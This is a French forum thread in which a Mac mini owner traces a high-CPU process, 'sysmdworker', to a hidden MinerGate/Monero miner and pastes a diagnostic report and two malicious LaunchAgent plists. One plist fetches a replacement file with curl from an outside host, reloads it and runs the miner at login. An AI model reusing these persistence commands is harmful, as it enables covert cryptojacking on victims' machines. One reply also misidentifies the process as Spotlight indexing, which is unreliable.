sysmdworker ?

Le
fra-PasDeSp
Bonjour

C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.

Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.

Bizarre. Qui peut m'en dire plus ?
--
Fra
Vos réponses Page 1 / 6
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Sinmian
Le #26462917
'lut,
(Joseph-B) Wrote in message:
Tu devrais envoyer un abuse à protonmail.ch :
je ne suis presque sûr que ce ne sont pas eux les initiateurs, mais des
malins seservent de leur soi-disant protection des contenus pour
installer un distributeur de malware.

Ce qui est à la mode en ce moment, ce sont les calculateurs de
monnaies virtuelles.
Certains prestataires le font sciemment à l'insu de leurs clients
et poussent les curseurs de temps machine un peu
haut...
Et puis, il y a les injections de code à l'insu des prestataires...
--
envoyé depuis mon téou
Un Sinmian ? Bien tassé, svp. [© BdV]
Sinmian
Le #26463000
Merci Fra, pour le feed-back.
Ces /miners/ clandos sont vraiment une plaie.
--
envoyé depuis mon téou
Un Sinmian ? Bien tassé, svp. [© BdV]
Sinmian
Le #26463073
'lut,
JPP
"forgeage" = traduction de "mining" ?

Oui, on a une certaine idée de la mine, ici. ;-)
--
envoyé depuis mon téou
Un Sinmian ? Bien tassé, svp. [© BdV]
fra-PasDeSp
Le #26462842
Fra
Bonjour
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.
Bizarre. Qui peut m'en dire plus ?

Une recherche sur l'internet ne donne aucune trace de sysmdworker.
Pourtant je l'ai vu :
http://fra.free.fr/Capture.jpg
Et il disparait 1-2 secondes après lancement du moniteur d'activité !
(et arrêt de la ventilation) (sinon ça ventile toujours)
--
Fra
fra-PasDeSp
Le #26462848
Fra
Bonjour
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.
Bizarre. Qui peut m'en dire plus ?

J'ai trouvé ça dans la console :
Date/Time: 2018-02-01 19:47:14 +0100
OS Version: Mac OS X 10.11.6 (Build 15G19009)
Architecture: x86_64
Report Version: 19
Command: sysmdworker
Path: /Users/USER/Library/mdworker/sysmdworker
Version: ??? (???)
Parent: launchd [1]
PID: 5560
Event: cpu usage (microstackshots only)
Thread: 0x2c404 (82% cpu over 110 seconds)
Duration: 110.00s
Steps: 112
Hardware model: Macmini5,1
Active cpus: 4
Fan speed: 4257 rpm
Powerstats for: sysmdworker [5560] thread 0x2c404
UUID: 8799A0B5-301F-3FC8-9C28-C293B19DBD3A
Start time: 2018-02-01 19:47:16 +0100
End time: 2018-02-01 19:48:58 +0100
Parent: launchd
Microstackshots: 28 samples (25%)
Primary state: 28 samples Non-Frontmost App, User mode, Thread QoS
Legacy
User Activity: 0 samples Idle, 28 samples Active
Power Source: 0 samples on Battery, 28 samples on AC
28 thread_start + 13 (libsystem_pthread.dylib) [0x7fff8b8e6351]
28 _pthread_start + 168 (libsystem_pthread.dylib) [0x7fff8b8e891a]
28 _pthread_body + 131 (libsystem_pthread.dylib) [0x7fff8b8e899d]
28 QThreadPrivate::start(void*) + 339 (QtCore) [0x108088613]
28 MinerGate::SimpleMinerThread::run() + 496 (sysmdworker)
[0x107fdc400]
14 cn_slow_hash_aesni + 1748 (sysmdworker) [0x107ff5d34]
13 cn_slow_hash_aesni + 1782 (sysmdworker) [0x107ff5d56]
1 cn_slow_hash_aesni + 1801 (sysmdworker) [0x107ff5d69]
Binary Images:
0x107f7d000 - 0x108021fff sysmdworker (0)
<8799A0B5-301F-3FC8-9C28-C293B19DBD3A>
/Users/USER/Library/mdworker/sysmdworker
0x108057000 - 0x108561fff QtCore (5.3)
<50192056-B44A-368A-9ADA-7030AA31AB88>
/Users/USER/Library/mdworker/*/QtCore.framework/Versions/5/QtCore
0x7fff8b8e5000 - 0x7fff8b8eeff7 libsystem_pthread.dylib
(138.10.4) <88FF5FCA-6275-3F82-BAF6-1B3ED639CC2A>
/usr/lib/system/libsystem_pthread.dylib
Powerstats for: sysmdworker [5560] (other threads)
UUID: 8799A0B5-301F-3FC8-9C28-C293B19DBD3A
Start time: 2018-02-01 19:47:17 +0100
End time: 2018-02-01 19:49:04 +0100
Microstackshots: 67 samples (59%)
Primary state: 66 samples Non-Frontmost App, User mode, Thread QoS
Legacy
User Activity: 0 samples Idle, 67 samples Active
Power Source: 0 samples on Battery, 67 samples on AC
67 thread_start + 13 (libsystem_pthread.dylib) [0x7fff8b8e6351]
67 _pthread_start + 168 (libsystem_pthread.dylib) [0x7fff8b8e891a]
67 _pthread_body + 131 (libsystem_pthread.dylib) [0x7fff8b8e899d]
67 QThreadPrivate::start(void*) + 339 (QtCore) [0x108088613]
67 MinerGate::SimpleMinerThread::run() + 496 (sysmdworker)
[0x107fdc400]
29 cn_slow_hash_aesni + 1782 (sysmdworker) [0x107ff5d56]
1 <Kernel mode>
28 cn_slow_hash_aesni + 1748 (sysmdworker) [0x107ff5d34]
4 cn_slow_hash_aesni + 1753 (sysmdworker) [0x107ff5d39]
1 cn_slow_hash_aesni + 1801 (sysmdworker) [0x107ff5d69]
1 cn_slow_hash_aesni + 1095 (sysmdworker) [0x107ff5aa7]
1 cn_slow_hash_aesni + 3413 (sysmdworker) [0x107ff63b5]
1 cn_slow_hash_aesni + 1736 (sysmdworker) [0x107ff5d28]
1 cn_slow_hash_aesni + 2894 (sysmdworker) [0x107ff61ae]
1 cn_slow_hash_aesni + 1841 (sysmdworker) [0x107ff5d91]
Binary Images:
0x107f7d000 - 0x108021fff sysmdworker (0)
<8799A0B5-301F-3FC8-9C28-C293B19DBD3A>
/Users/USER/Library/mdworker/sysmdworker
0x108057000 - 0x108561fff QtCore (5.3)
<50192056-B44A-368A-9ADA-7030AA31AB88>
/Users/USER/Library/mdworker/*/QtCore.framework/Versions/5/QtCore
0x7fff8b8e5000 - 0x7fff8b8eeff7 libsystem_pthread.dylib
(138.10.4) <88FF5FCA-6275-3F82-BAF6-1B3ED639CC2A>
/usr/lib/system/libsystem_pthread.dylib
--
Fra
fra-PasDeSp
Le #26462861
Fra
Bonjour
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.
Bizarre. Qui peut m'en dire plus ?

2 fichiers suspects dans mes launchagents de mon user :
MacOSupdate.plist:
----- <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<dict>
<key>Label</key>
<string>MacOSupdate</string>
<key>ProgramArguments</key>
<array>
<string>sh</string>
<string>-c</string>
<string>launchctl unload -w
~/Library/LaunchAgents/MacOS.plist && rm -rf
~/Library/LaunchAgents/MacOS.plist && curl -o
~/Library/LaunchAgents/MacOS.plist
https://public.adobecc.com/files/1UJET2WD0VPD5SD0CRLX0EH2UIEEFF?content_disposition=attachment
&& launchctl load -w ~/Library/LaunchAgents/MacOS.plist &&
~/Library/mdworker/mdworker</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>

MacOS.plist
-----
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<dict>
<key>Label</key>
<string>MacOS</string>
<key>ProgramArguments</key>
<array>
<string>sh</string>
<string>-c</string>
<string>~/Library/mdworker/sysmdworker -user
-xmr</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
-----
</plist>
-----
surtout le 2è qui a dedans le nom du process coupable et un mail bizarre
!
Comment c'est arrivé là ??
--
Fra
mv
Le #26462875
Fra
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.

Ça fait partie de l'indexation Spotlight au même titre que mdworker et
autres bidules du même style.
Ton mini est "nouveau", donc l'indexation Spotlight fait son boulot et
ça peut durer plus ou moins longtemps.
Cordialement.
--
Michel Vauquois - Nouveau : et
fra-PasDeSp
Le #26462885
MV
Fra
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.

Ça fait partie de l'indexation Spotlight au même titre que mdworker et
autres bidules du même style.
Ton mini est "nouveau", donc l'indexation Spotlight fait son boulot et
ça peut durer plus ou moins longtemps.

Sauf que mdworker n'est pas sensé se lancer de mon dossier User (voir
autre post sur les launchagents)
Je viens de virer un dossier mdworker dans MON dossier Library avec
dedans mdworker sysmdworker et un dossier Frameworks avec dedans :
QtCore.framework
QtNetwork.framework
QtSql.framework
QtWebSockets.framework
Bref plein de faux processes à lancer qui ressemblent à ceux du système.
Putain comment j'ai chopé ça ? Je suis super prudent. Et hier je l'avais
pas. Les seules choses que j'ai faites c'est l'install de l'ancien
disque dans le nouveau mini et l'installation d'une nouvelle version
d'Onyx.
--
Fra
fra-PasDeSp
Le #26462890
Fra
Bonjour
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.
Bizarre. Qui peut m'en dire plus ?

Je penche de plus en plus pour un faux Onyx téléchargé sur MacUpdate (il
ne fait que 8,6 MO au lieu d'une 30aine)
--
Fra
josephb
Le #26462889
Bonsoir,
Fra
~/Library/mdworker/sysmdworker

Je suis comme toi en 10.11.6 et je n'ai aucun répertoire /mdworker/ dans
la bibliothèque de mon compte.
mdworker est un process associé à Spotlight, normalement pas un
répertoire et quant sysmdworker, jamais vu non plus.
Ça pue le truc forgé de toutes pièces, d'autant que l'on voit que c'est
un script shell censé s'effectuer au chargement.
Ce pourrait-être un malware qui scanne ton Mac pour en aspirer les
infos?
Fais une recherche google sur "protonmail", c'est très bizarre et ce
n'est pas cette page qui me rassurerait
Si ça peut t'aider
--
J. B.
Publicité
Poster une réponse
Anonyme